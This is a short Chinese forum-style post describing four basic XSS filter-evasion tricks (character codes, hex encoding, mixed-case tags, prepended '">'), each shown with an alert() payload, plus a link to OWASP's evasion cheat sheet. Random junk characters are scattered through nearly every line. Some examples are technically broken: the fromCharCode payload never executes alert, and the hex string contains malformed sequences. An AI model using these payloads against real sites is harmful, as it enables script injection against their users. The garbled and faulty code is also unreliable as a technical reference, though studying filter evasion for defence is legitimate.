四种超级基础的绕过方法。7 v* t3 w0 T8 S
1.转换为ASCII码, J( ?) Q! E# C2 |% M- v0 t0 \
例子:原脚本为<script>alert(‘I love F4ck’)</script ># _6 j8 b. |, Z' x" h2 ^
通过转换,变成:
+ }) H) L2 @' ~<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
- C$ K0 }* f' X% Y0 P0 z( q7 F+ @! M ; t/ z) m2 x- W
2.转换为HEX(十六进制)
; I4 c }# y! U3 d! ^- |3 i例子:原脚本为<script>alert(‘I love F4ck’)</script>
: _3 R9 Z3 V& _) Z8 |8 h9 X通过转换,变成:
6 ~7 H; A7 b/ N3 n6 t* U%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
# _1 [, z n; |' Y& F# K/ \7 p
]5 h. Y7 u% ~3 V# t3 f: e8 V' u3.转换脚本的大小写
5 x% i, [5 B* F& h例子:原脚本为<script>alert(‘I love F4ck’)</script>
+ R, h! w/ F+ ^5 ~4 g转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>3 \6 m @: f# K8 s: P9 E; j+ z7 D/ h
6 V- J& y1 l: T- v/ P4 C0 V
4.增加闭合标记”>
0 ?3 z/ z/ v) f' m7 ?: }% u" K例子:原脚本为<script>alert(‘I love F4ck’)</script>
- s9 x, Y# v2 n: }# } P" A转换为:”><script>alert(‘I love F4ck’)</script>
! C4 m4 W- k9 v; D* V) ~! w更详细绕过技术请参考此网页
1 N+ b# }# _% K: ~' D2 Uhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
^5 {* ^5 N. z" H ) O2 B; `* b9 e% y% n( F+ e0 _
转换工具使用的是火狐的 hackbar mozilla addon. |